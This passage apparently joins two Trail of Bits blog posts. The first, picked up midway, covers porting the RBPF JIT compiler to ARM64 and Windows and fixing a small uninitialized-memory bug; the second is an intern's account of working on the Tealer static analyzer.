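    Keeping reservations aligned comes down to rounding up to a multiple of 16 before adjusting SP, as in this small helper (illustrative only):

    // Round a stack reservation up to the next multiple of 16 so that SP
    // stays 16-byte aligned across SP-relative accesses.
    fn align_stack_reservation(bytes: u64) -> u64 {
        (bytes + 15) & !15
    }
    // e.g., align_stack_reservation(24) == 32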

    The subroutines (which are responsible for exception handling, address translation, resolving indirect calls, and other fairly complex logic such as instruction meter accounting) each have slightly different conventions for their inputs and outputs, and these conventions are not well documented. Rewriting them correctly in ARM64 was, by far, the most time-consuming part of this process, and I eventually documented many of my assumptions about them.

    When I published the ARM64 port, I made sure it was behind a feature gate, jit-aarch64-not-safe-for-production. The port is an intern project meant to let developers use the JIT compiler; it should not be considered production-ready until it has received a thorough peer review.

    My ARM64 port of RBPF is currently available through the Trail of Bits fork or this pull request.

    Porting RBPF to Windows

    Winapi

    Windows uses the VirtualAlloc and VirtualProtect APIs for virtual memory management in lieu of mmap and mprotect. For our purposes, these are nearly drop-in replacements; I just had to pick the permission and allocation options that correspond most closely to those used in mmap and mprotect.
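    As a rough sketch of that correspondence using the winapi crate (the exact flag choices RBPF makes may differ):

    #[cfg(windows)]
    fn alloc_jit_region(size: usize) -> *mut u8 {
        use winapi::um::memoryapi::VirtualAlloc;
        use winapi::um::winnt::{MEM_COMMIT, MEM_RESERVE, PAGE_READWRITE};
        // Roughly equivalent to an anonymous, private, read-write mmap.
        unsafe {
            VirtualAlloc(std::ptr::null_mut(), size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE) as *mut u8
        }
    }

    #[cfg(windows)]
    fn make_executable(addr: *mut u8, size: usize) -> bool {
        use winapi::um::memoryapi::VirtualProtect;
        use winapi::um::winnt::PAGE_EXECUTE_READ;
        let mut old: u32 = 0;
        // Roughly equivalent to mprotect(addr, size, PROT_READ | PROT_EXEC).
        unsafe { VirtualProtect(addr as _, size, PAGE_EXECUTE_READ, &mut old) != 0 }
    }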

    Calling convention

    The Windows x64 calling convention designates a different set of caller- and callee-saved registers; it also has an additional “shadow space” requirement, in which the caller must leave 32 bytes of space on the stack before a call (after any stack-resident arguments have been pushed).
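    In emitted code, that means adjusting the stack around every such call, roughly as in this hypothetical text-emitting sketch:

    fn emit_win64_call(emit: &mut dyn FnMut(&str), target: &str) {
        emit("sub rsp, 32");  // reserve the caller-provided shadow space
        emit(&format!("call {}", target));
        emit("add rsp, 32");  // release it once the callee returns
    }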

    As with ARM64, Windows support is behind a feature flag, jit-windows-not-safe-for-production.

    A small, unexploitable bug

    My ARM64 port of RBPF did uncover a small, unexploitable uninitialized memory bug that was present even in the existing x86 JIT compiler. VTCAKAVSMoACE pointed out some warnings when running my ARM64 branch under the LLVM memory sanitizer (MSAN). I investigated these warnings and found the culprit to be this function:

    fn emit_set_exception_kind<E: UserDefinedError>(jit: &mut JitCompiler, err: EbpfError<E>) {
        // Wrap the error in a Result to match the layout used elsewhere.
        let err = Result::<u64, EbpfError<E>>::Err(err);
        // Read the 8 bytes at offset 8 of the Result, assumed to be the
        // enum discriminant (this assumption turned out to be wrong).
        let err_kind = unsafe { *(&err as *const _ as *const u64).offset(1) };
        ...
        // Embed err_kind as an immediate operand in the emitted store.
        emit_ins(jit, X86Instruction::store_immediate(OperandSize::S64, R10, X86IndirectAccess::Offset(8), err_kind as i64));
    }

    This function takes an EbpfError value as its second argument, wraps it in a Result, and then uses unsafe code to read the 8 bytes at offset 8 of the Result. These bytes are assumed to hold the integer discriminant that determines which variant (error type) the EbpfError is. However, the Rust compiler makes no guarantees about the size or layout of enums unless you add a repr attribute to the enum (like #[repr(u64)]).

    The Rust compiler had decided that the EbpfError enum discriminant needed only a u8, so 7 of the 8 bytes that emit_set_exception_kind read were uninitialized stack memory, which was then written into the JIT code region. Uninitialized (potentially attacker-controlled) bytes written into an executable region are not a vulnerability on their own, but they partially defeat the purpose of the code-reuse mitigations discussed above.

    I opened a pull request that adds #[repr(u64)]. Since the JIT compiler makes an additional assumption about enum layouts (i.e., for Result in the Rust standard library), I also added tests that should detect whether the compiler ever changes the location or size of the enum discriminant on certain types.
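    The shape of the fix and the layout check can be illustrated with a simplified enum (DemoError is hypothetical; the real EbpfError has many variants, and the real tests live in RBPF):

    #[repr(u64)] // pin the discriminant to a stable, 8-byte representation
    enum DemoError {
        DivideByZero = 0,
        AccessViolation = 1,
    }

    #[test]
    fn discriminant_is_the_first_eight_bytes() {
        let err = DemoError::AccessViolation;
        // With #[repr(u64)], the first 8 bytes of the enum hold the discriminant.
        let kind = unsafe { *(&err as *const DemoError as *const u64) };
        assert_eq!(kind, 1);
    }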

    Conclusion

    Given how important the RBPF JIT compiler is to the Solana blockchain, we felt it was important that the widest possible range of developers be able to use it on whatever machine they develop on. Now developers on both M1 and Windows machines can use the JIT compiler during testing. While the work still needs a peer review, it can be found in two pull requests on GitHub. Feel free to try it out!

    Thanks to Anders Helsing for the fantastic guidance as I explored the internals of RBPF and learned the finer points of both the ARM64 and Windows x64 ABIs.

    This work shows how Trail of Bits is rooted in solving Solana’s security challenges, building on the deep Solana expertise behind the tools we have already released to the public. Not only do we aim to make Solana as secure as possible, but we also want to make the tools engineers use with Solana equally secure. Our ultimate goal with these efforts is to raise the security level of all the Solana projects that will be built in the future.

    Working on blockchains as a Trail of Bits intern

    By Vara Prasad Bandaru

    Earlier this year, I successfully completed my internship at Trail of Bits and secured a full-time position as a Blockchain Security Analyst.

    This post is not intended to be a technical description of the work I did during my internship. Rather, it is intended to describe my general experience as a Trail of Bits intern. I hope that reading about my experience will motivate others to apply for future internships at Trail of Bits.

    First, I will introduce myself and give some background on my technical expertise. Then, I will explain the application and interview processes and describe some of the work I did during my time as an intern (spoiler alert: I worked on Tealer, a static analyzer for Algorand smart contracts!). Finally, I’ll provide a list of takeaways that I would have wanted to know when I applied and a few things I liked about interning at Trail of Bits.

    Who am I?

    I’m in my final year of my bachelor’s program in computer science at RGUKT Nuzvid, a tier 3 college in India. Before my internship at Trail of Bits in the winter of 2021, I didn’t have much industry experience other than completing one computer science project (Monkey Interpreter, a Python rewrite of a Golang implementation) and competing in capture-the-flag (CTF) competitions. I began competing in CTFs near the end of the first year of my bachelor’s program (and still do on the weekends) under the username S3v3ru5.

    I mainly concentrated on cryptography-related challenges, my strongest category, when I first started competing in CTFs. But around August of 2021, I began participating in blockchain-related challenges to gain experience in this technology that everyone is talking about. I was able to complete an easy Solana blockchain challenge in the ALLES CTF and all of the Ethereum blockchain challenges in the Ethernaut CTF, a web3/Solidity-based war game. I began this work only about a month and a half before I applied for my internship at Trail of Bits. As you can see, I didn’t have much blockchain experience beforehand.

    It was through my work on these CTFs that I became familiar with Trail of Bits. I would always see Trail of Bits in the sponsors section of the CTFs I competed in, and I still remember solving a challenge presented by Trail of Bits in one of the CSAW finals. I always referred to (and still do) the Trail of Bits CTF guide and blog posts, especially “ECDSA: Handle with Care.”

    Applying for the internship

    As I was approaching the end of 2021, I started looking into cybersecurity internships, mainly those related to cryptography (my strong suit) and blockchain (my most recent area of interest). There were very few internships that both related to my interests and would accept a bachelor’s student who had no prior experience other than competing in CTFs and who hadn’t completed many projects. But I did remember that Trail of Bits is a top cybersecurity research and consulting firm that values CTFs, emphasizes self-learning, and gives people chances.

    I decided to look into Trail of Bits’s open roles and discovered the winternship program, in which interns work on a Trail of Bits project, or even on their own security-related projects, under the guidance of a mentor. The internship is paid and takes place over the winter break to give students and new security engineers real industry experience and an opportunity to write a publication for their resumes. An internship at Trail of Bits could even lead to an offer for a full-time role.

    I wasn’t working on any projects at the time I applied for the internship, so I decided to apply for a few of the available Trail of Bits projects that seemed interesting to me. First, I applied to two projects that would allow me to gain more experience with blockchain technology: Manticore, a symbolic execution tool developed by Trail of Bits for analyzing Ethereum smart contracts and Linux ELF binaries, and a project researching the Solana blockchain. Both Ethereum and Solana are blockchains I’m technically familiar with, so I thought those projects would be a good fit. However, I later decided to apply to work on Tealer, a static analyzer for code written in Teal, an assembly-like language used in the Algorand blockchain. Even though I didn’t have experience with static analysis or the Algorand blockchain, Tealer was both a relatively small and new project: I knew that I could easily read through the source code to get my feet wet and that my work on this project could form the basis for future work. Finally, the application procedure was the same for all three projects, so I thought, “why not?”

    I was invited to an initial 30-minute phone screen to discuss both Manticore and Tealer. It was my first interview, so I was a little nervous, but the Trail of Bits engineer I interviewed with, Felipe Manzano (who later became one of my mentors), made the experience enjoyable and stress-free. It felt more like a casual conversation with a friend about the work and my experience and interests. After that, we had another five-minute call to discuss the internship start date, the place of work, and other onboarding information. I received the offer letter later that day: I was selected to work on Tealer, the project I was hesitant to apply for.

    I was surprised by this interview process: it was entirely different from many of my friends’ experiences interviewing with other companies and, for an internship role, far easier and more pleasant than most.

    Preparing for the internship

    As I prepared for my first internship, I realized that I was not familiar with many of the tools and concepts that I would be working with. For example, I hadn’t worked with the Algorand blockchain or static analysis tools, and I wasn’t very experienced in Git or GitHub. I was worried that I was going to fail in my internship if I didn’t put in the effort to learn these tools and concepts before my internship started.

    My internship was supposed to start on December 13, 2021, so I began preparing on the first day of December. During those first 10 days of December, I read through various resources to learn about static analysis, the Algorand blockchain, Git, and GitHub. My preparation paid off: even before my internship started, I found discrepancies between Tealer’s parsing of Teal code and the developer docs!

    During the internship

    Because of the level of preparation I did before my start date, I was able to start my work on Tealer on my first day. During my internship, I accomplished the following:

    I really liked working on Tealer, and my internship overall was an excellent experience. All my work was open for review and merged after approval. I received very good feedback and help whenever I was stuck. I was able to be involved in active discussions about the tool. And receiving an offer for a full-time position because of my performance in the internship made my experience even better.

    Tips and takeaways

    I’d like to offer some tips to prospective interns that I wish I had heard before my internship. Now that I have first-hand experience with a Trail of Bits internship, I can speak to how true these tips really are.

    • It’s OK if you don’t meet all the requirements of an internship that you’re applying for. There’s nothing wrong with applying. I was hesitant to apply to work on Tealer, but in the end, it worked out very well for me.
    • You don’t have to know everything you need to know for the internship you’re applying for. The point of an internship is to gain experience and to learn new things. Also, employers don’t look for people who already know everything (no one does) but for people who can learn and gain the required knowledge if given enough time.
    • Always ask for and take suggestions when in doubt.
    • Always seek help from your mentors. You don’t have to figure out everything by yourself, and nobody expects you to. Mentors are more experienced, have more knowledge, and are there to help their interns.
    • For those who are non-native English speakers, as I am, don’t stress if you are not fluent in English. As long as your coworkers can understand what you’re trying to communicate, it’s OK if you’re not very fluent or make mistakes. Of course, it’s a great idea to improve your communication skills in the long term, but never let your current level in English stop you from applying to internships.

    Why apply for the Trail of Bits internship?

    I can’t say enough good things about my experience interning at Trail of Bits. From the stress-free interview process, to my ability to participate in active discussions about the project, to the direct merging of my work, it was a great experience. In short, I was an intern, but I felt like a full-time employee. Still, here are some highlights from my internship:

    • I was given the freedom to work on the tool the way I wanted. I was never told not to do something as long as what I wanted to do improved the tool and worked toward the goal.
    • I didn’t have any restrictions on what time I worked or how long I worked for. There were days when I couldn’t make much progress on the project, as generally happens with me when I start working on something new, but I had the freedom to work at my own pace.
    • Finally, the biggest highlight of my internship was when Dan, the Trail of Bits CEO, sent a small message over Slack appreciating my work. I didn’t think I would feel this way when I read similar stories from other interns, but I really felt proud. I still remember showing that message to some of my friends.

    A heartfelt thanks

    I’d like to thank Felipe Manzano and Josselin Feist for giving me free rein over the project and making my first internship an extraordinary learning experience. Also, thank you to Trail of Bits for extending the offer to join the company full-time after my studies. This internship couldn’t have been any better, and I am hoping for a similar experience in my full-time role.

    One thing I wanted to change while writing this blog post is the use of the word “I.” Using “I” makes it feel like this experience was solely mine. This isn’t true: this story could have easily been yours. Make sure to look out for the next open internships at Trail of Bits and have your own extraordinary experience.